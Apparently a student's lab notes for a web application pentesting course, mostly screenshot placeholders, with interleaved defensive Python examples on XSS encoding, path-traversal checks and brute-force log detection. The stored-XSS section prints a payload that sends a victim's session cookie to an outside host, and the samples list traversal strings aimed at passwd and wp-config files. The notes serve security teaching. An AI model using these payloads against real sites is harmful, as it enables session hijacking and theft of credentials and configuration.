| Title | Author | Created | Published | Tags |
| ----- | ------ | ------- | --------- | ---- |
| Module 8 - Web App Pentesting | <ul><li>Jon Marien</li></ul> | July 13, 2025 | July 13, 2025 | [[#skillsontario\|#skillsontario]], [[#competitions\|#competitions]], [[#certifications\|#certifications]], [[#classes\|#classes]] |

# Task - Lab 8

## **CyberQ Module 8 Lab**

1) Capture all flags.
2) Complete the following exercises:
   - Exercise 1: Gathering Information About a Target Using WhatWeb
   - Exercise 2: Web Application Vulnerability Assessment Using Vega
   - Exercise 3: Pentesting Identified Web Applications Vulnerabilities
   - Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities
   - Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application
   - Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite
   - Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell
   - Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell

## **Output/Report**

1) Screenshot of finished lab score.
2) Screen captures of the following steps from the CyberQ Lab Instructions document:
   - Exercise 1: Gathering Information About a Target Using WhatWeb (Step: 7)
   - Exercise 2: Web Application Vulnerability Assessment Using Vega (Step: 8)
   - Exercise 3: Pentesting Identified Web Applications Vulnerabilities (Step: 24)
   - Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities (Step: 27)
   - Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application (Steps: 9, 15)
   - Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite (Steps: 8, 22, 32, 37)
   - Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell (Steps: 8, 12)
   - Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell (Step: 11)

Use the Lab Guide for preparing the report.

---

# Module 08: Web Application Penetration Testing Methodology

## Objective

The objective of this lab is to provide expert knowledge of web application vulnerabilities and web application attacks such as:

- SQL Injection
- Parameter tampering
- Cross-Site Scripting (XSS)
- Dictionary Attacks
- Shell Upload
- Directory Traversal

## Scenario

A web application is an application that users access over a network such as the Internet or an intranet. The term may also refer to a software application that is written in a browser-supported programming language (such as JavaScript, combined with a browser-rendered markup language like HTML) and relies on a common web browser to run it. Web applications are popular because web browsers are ubiquitous and convenient to use as a client. The ability to update and maintain web applications without distributing and installing software on potentially thousands of client computers is a key reason for their popularity, as is the inherent support for cross-platform compatibility.
Common web applications include webmail, online retail sales, online auctions, wikis and many other functions. Web hacking refers to the exploitation of applications via HTTP, which can be done by manipulating the application through its graphical web interface, tampering with the Uniform Resource Identifier (URI), or tampering with HTTP elements not contained in the URI. Methods used to attack web applications include SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), insecure communications, etc.

As an expert _Penetration Tester_ and _Security Administrator_, you need to test web applications for cross-site scripting vulnerabilities, cookie hijacking, command injection attacks, file upload vulnerabilities, etc., and secure web applications against such attacks.

---

# Exercise 1: Gathering Information About a Target Using WhatWeb

## Scenario

WhatWeb identifies websites. It recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

The objective of this lab is to help students learn how to:

- Identify the target website technologies
- Perform aggressive scans
- Log output in XML format

---

##### *Required: Step - 7*

![[{DABB0F38-0ADF-4D5D-A427-947E825AD9F9}.png]]

![[{34858C5C-2109-43E8-9910-BE56732B2A5D}.png]]

###### **STEP 7:**

![[{D5B40F0D-9670-4355-9FDC-09C6F323D138}.png]]

> [!answer]-
> ![[{0C8FCB2C-F318-4302-AEE6-9276362E5A68}.png]]

---

# Exercise 2: Web Application Vulnerability Assessment Using Vega

## Scenario

Vega is a free and open source scanner and testing platform for testing the security of web applications. Vega can help find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities.
It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS, SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: JavaScript.

The objective of this lab is to help students learn how to:

- Use Vega to perform a Web Application Vulnerability Assessment
- Generate reports and examine them

---

##### *Required: Step - 8*

###### **STEP 8:**

![[{153ECFD3-7930-4067-8BD5-715D6538DFC3}.png]]

---

# Exercise 3: Pentesting Identified Web Applications Vulnerabilities

## Scenario

In the previous lab exercise, you performed web application vulnerability analysis using Vega. In that exercise, the web app scanner discovered two major vulnerabilities: XSS and SQL Injection. When attackers identify such vulnerabilities, they gain access to sensitive information, leading to a data breach. As a Penetration Tester, you should know how to pentest these vulnerabilities and extract sensitive data.
In this lab, you will learn how to:

- Pentest a cross-site scripting vulnerability using JavaScript
- Pentest a SQL injection vulnerability using sqlmap

---

##### *Required: Step - 24*

![[{20296D00-F8CD-4D9E-B622-0785D664E9EB}.png]]

![[{4655F33C-E774-4BFB-BCC4-0B02F2A56EED}.png]]

Took a few tries, but got it in the end:

![[{55B6E9AF-D380-49C0-B2F8-911932AA7039}.png]]

![[{351B899B-D1B3-480B-AA94-4C05423B585B}.png]]

![[{04E50601-8797-4979-9BDD-E2785E50C182}.png]]

![[{D2C08125-C003-4D1C-8D16-12BCD665D1E2}.png]]

![[{BEFA98A4-27D1-438C-B975-80E7DCDE608B}.png]]

![[{775B38C1-C58C-46B6-B85F-F36B29E2560F}.png]]

###### **STEP 24:**

![[{ABA36745-FAAC-42B9-992D-C523E62121B3}.png]]

![[{5BB2B804-854F-4F89-8D9B-FB2888286AB5}.png]]

---

# Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities

## Scenario

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, a message forum, a visitor log, or a comment field. The victim then retrieves the malicious script from the server when requesting the stored information. Stored cross-site scripting attacks are persistent: the script stays implanted on the target server until its presence is detected and it is removed. When an employee in an organization unknowingly becomes a victim of this script, attackers obtain the session ID corresponding to the victim and thereby take over the victim's session without legitimately logging in to the web application. As an Ethical Hacker or Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect user sessions from being stolen.
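Added example, not part of the lab or course material: the stored-XSS rendering bug described above beside its output-encoded form, plus a check for the cookie attributes that stop a script that does run from reading the session. The comment template, the placeholder attacker hostname and the `PHPSESSID` cookie name are assumptions; the stored comment is constructed to match the shape of the lab's anchor payload.

```python
import html
import re

# Constructed stored comment, shaped like the lab's anchor payload that leaks
# document.cookie to an attacker-controlled URL (hostname here is a placeholder).
STORED_COMMENT = (
    '<a onclick="document.location=\'http://ATTACKER.example/?c=\'+escape(document.cookie);" '
    'href="#">Please click here</a>'
)

COMMENT_TEMPLATE = '<div class="comment">{body}</div>'  # assumed page fragment


def render_vulnerable(comment: str) -> str:
    """Interpolates stored, user-controlled text straight into HTML: the stored XSS bug."""
    return COMMENT_TEMPLATE.format(body=comment)


def render_hardened(comment: str) -> str:
    """Output-encodes the stored text so the browser treats it as data, not markup."""
    return COMMENT_TEMPLATE.format(body=html.escape(comment, quote=True))


_TAG_RE = re.compile(r"<\s*/?[a-zA-Z][^>]*>")


def body_contains_markup(rendered: str) -> bool:
    """Check used here: did any HTML tag survive inside the rendered comment body?"""
    prefix, suffix = COMMENT_TEMPLATE.split("{body}")
    inner = rendered[len(prefix):len(rendered) - len(suffix)]
    return _TAG_RE.search(inner) is not None


def cookie_flags_missing(set_cookie_header: str) -> list:
    """Second layer: a session cookie without HttpOnly is readable by document.cookie,
    which is exactly what the stored script relies on; Secure keeps it off plaintext HTTP."""
    attributes = {part.strip().split("=", 1)[0].lower()
                  for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure") if flag.lower() not in attributes]


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENT))
    print(render_hardened(STORED_COMMENT))
    print(cookie_flags_missing("Set-Cookie: PHPSESSID=abc123; Path=/"))
```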
The objective of this lab is to help students learn how to:

- Test web applications for vulnerabilities
- Use Firebug to hijack a session

---

##### *Required: Step - 27*

`<a onclick="document.location='http://www.oceanplaza.com/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>`

This part (Step 6-7) broke for me:

![[{B0AECDF8-09DA-4926-B8D9-B9A458040CFB}.png]]

###### **STEP 27:**

![[{CF1D943C-9712-4D31-A1E8-26E5C69338BE}.png]]

> [!answer]-
> ![[{AA41220C-0133-437B-9097-21193C98CD19}.png]]

---

# Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application

## Scenario

Directory traversal allows attackers to access restricted directories, including application source code, configuration, and critical system files, and to execute commands outside of the web server's root directory. Attackers usually manipulate variables that reference files with "dot-dot-slash (../)" sequences and their variations to reach these restricted directories. As a penetration tester, you need to know how to identify a directory traversal vulnerability and pentest it to gain access to sensitive information.
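Added example, not from the lab materials: a containment check for a file-download parameter that normalizes the `../` variants the scenario mentions (URL-encoded, double-encoded and backslash forms) before resolving the path against the directory it is allowed to serve. The uploads directory and the sample requests are constructed assumptions, not values from the lab.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed directory the download handler may serve from (not a path from the lab).
UPLOADS_DIR = "/var/www/html/wp-content/uploads"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so %2e%2e%2f and double-encoded %252e
    variants normalize to the same characters before any path logic runs."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_download_path(requested: str, base_dir: str = UPLOADS_DIR) -> Optional[str]:
    """Map a user-supplied 'file' parameter onto base_dir and return the absolute
    path only if the normalized result is still inside base_dir, otherwise None."""
    decoded = fully_decode(requested).replace("\\", "/")  # backslash separators are a traversal variant
    if "\x00" in decoded:                                  # NUL truncation against C-level file APIs
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


# Constructed sample requests: what a download handler might receive in its 'file' parameter.
SAMPLE_REQUESTS = [
    "2025/07/report.pdf",
    "../../../../etc/passwd",
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "%252e%252e%252f%252e%252e%252fwp-config.php",
    "..\\..\\wp-config.php",
    "2025/07/../../../wp-config.php",
]


def triage(requests):
    """Return {request: resolved path or 'REJECTED'} for log review."""
    return {r: (safe_download_path(r) or "REJECTED") for r in requests}


if __name__ == "__main__":
    for req, result in triage(SAMPLE_REQUESTS).items():
        print(f"{req!r:50} -> {result}")
```

Only the first sample resolves; the rest are rejected because the normalized path leaves the uploads directory, even though some of them stay inside the web root.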
In this lab, you will learn how to:

- Enumerate WordPress plugins using wpscan
- Identify vulnerabilities using SearchSploit
- Exploit the vulnerability to download sensitive files

---

##### *Required: Steps - 9, 15*

![[{DDBD011A-1BF9-4067-8D2E-BBD23390D619}.png]]

![[{9BE4E778-20CE-4BA2-AA6E-CD349401C627}.png]]

![[{F734DE72-992E-4A00-94B5-868E246B0542}.png]]

![[{1D5EC0F9-72B4-4925-A867-0576358533C8}.png]]

###### **STEP 9:**

![[{2D5DE803-F54B-43F8-8544-E6C57C3E317C}.png]]

![[{2C45A423-2A11-4A11-91DE-0586BF68949B}.png]]

###### **STEP 15:**

![[{87F32CFD-58DD-40FF-97FD-E5B57D768F75}.png]]

> [!answer]-
> ![[{D31FD2C9-9C9F-4AA3-ABD6-5B3073630564}.png]]

---

# Exercise 6: Performing Dictionary Attack on a WordPress Web Application using Burp Suite

## Scenario

Using weak username/password combinations to log in to web applications may allow attackers to brute-force them and gain access. This leads to unrestricted access to user accounts and manipulation of the data in those accounts. As a penetration tester, you should be able to identify weak username/password combinations in web applications. In this lab, you are going to learn how to perform a dictionary attack on a WordPress web application using Burp Suite.
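Added example, not from the lab materials: detection logic for the login-guessing pattern described above, run over constructed Apache access-log lines. It assumes the usual WordPress behaviour of re-rendering `wp-login.php` with HTTP 200 on a failed POST and redirecting with 302 on success; the IP addresses, timestamps and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not captured from the lab environment).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jul/2025:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4390 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4390 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4390 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4390 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4390 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Jul/2025:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Jul/2025:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Jul/2025:10:05:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?")[0], int(status)


def detect_login_bursts(log_text, window=timedelta(minutes=5), threshold=5):
    """Flag IPs with >= threshold failed POSTs (status 200) to /wp-login.php inside
    `window`, and record whether a 302 (successful login) appeared in the same burst."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            by_ip[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # slide the window over each start point
            burst = [s for t, s in events[i:] if t - start <= window]
            failures = sum(1 for s in burst if s == 200)
            if failures >= threshold:
                findings[ip] = {"failed": failures, "success_after": 302 in burst}
                break
    return findings
```

A burst that ends in a 302 is the case worth paging on: the guessing stopped because a credential worked, which is the outcome the lab's Exercise 7 builds on.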
---

##### *Required: Steps - 8, 22, 32, 37*

![[{1CB7CB67-166E-42F6-9644-180350C8F1A8}.png]]

###### **STEP 8:**

![[{F89CA164-8583-4E43-BF8F-A141A485FC4A}.png]]

###### **STEP 22:**

![[{A2E7926E-7B0A-401B-95EC-FF473A7F3645}.png]]

![[{90EB5CF7-295A-4C31-88E6-5B9E1CA1F650}.png]]

![[{B9F8FB91-595F-4189-9BFF-3CFA60DE1AFC}.png]]

###### **STEP 32:**

![[{437AD1CF-79BD-49FA-89EA-16AD7568DF6C}-2.png]]

![[{BA99339E-70F2-4BCE-8FF4-E69FAB41F06B}.png]]

###### **STEP 37:**

Now we try the `user:pass` combo:

![[{EE72C949-4D32-416E-8F88-58C745386533}.png]]

> [!answer]-
> ![[{009B1722-1350-435C-A63B-A5E65201D0D2}.png]]

---

# Exercise 7: Exploiting WordPress Web Application Vulnerability by Uploading a Customized Shell

## Scenario

Some older versions of the WordPress web application give the admin user an option to edit the footer, archive.php and 404.php files. If the admin logs in with weak credentials and an attacker is able to crack them, the attacker may break into the account, upload a shell, and gain access to the entire server hosting the web application. As a penetration tester, you need to know how to create a customized PHP shell and identify the entry points where it can be uploaded. This lab is a continuation of the previous lab exercise.

In this lab, you are going to learn how to:

- Create a customized PHP shell
- Identify the entry point and insert the shell code in it to gain access to the server

---

##### *Required: Steps - 8, 12*

![[{1E76586C-3FE4-4873-8E40-0C8292685411}.png]]

###### **STEP 8:**

![[{81FF2486-9C21-4CDA-95D2-8A19F757CAC1}.png]]

![[{A9F48313-A3F5-4B9F-9532-7A20176FD8E4}.png]]

We paste this new "theme" in the 404 Template:

![[{93ECCA06-E053-441D-98E3-9977B7FD7663}.png]]

###### **STEP 12:**

![[{D317FCBD-7792-4A85-BCB1-86FF66A2762C}.png]]

Make sure to UPDATE THE FILE!
![[{9FC1CE78-882D-48CF-A7BA-DEE750891FEC}.png]]

---

# Exercise 8: Directory Browsing a WordPress Website using DirBuster and Accessing Shell

## Scenario

This lab is a continuation of the previous lab exercise, in which you learned how to create a shell and upload it. It is essential for a pentester to determine the directory structure of a web application in order to browse it and find out whether any unnecessary or sensitive folders are browsable. In this lab, you are going to learn how to browse directories using DirBuster, determine the location of the shell (uploaded in the previous lab exercise), browse to it, and gain access to the server.

---

##### *Required: Step - 11*

Start `dirbuster` with these settings:

![[{D599B89D-AB8D-48C6-9F03-0D3FD75D94CB}.png]]

![[{17C54BFC-511C-4C63-AF3E-7101C3E826C3}.png]]

![[{C2A39A05-E9A9-49AD-B6D0-5A0F0D3C989A}.png]]

![[{FA64D6BB-A8F7-4D62-80EE-EED60F789506}.png]]

###### **STEP 11:**

`b374k sh` is successful!

![[{F77E76E3-4786-4B69-961E-3F229359E878}.png]]

> [!answer]-
> ![[{E3F34823-7595-486C-A08E-8B80DBCD6062}.png]]

---

All done!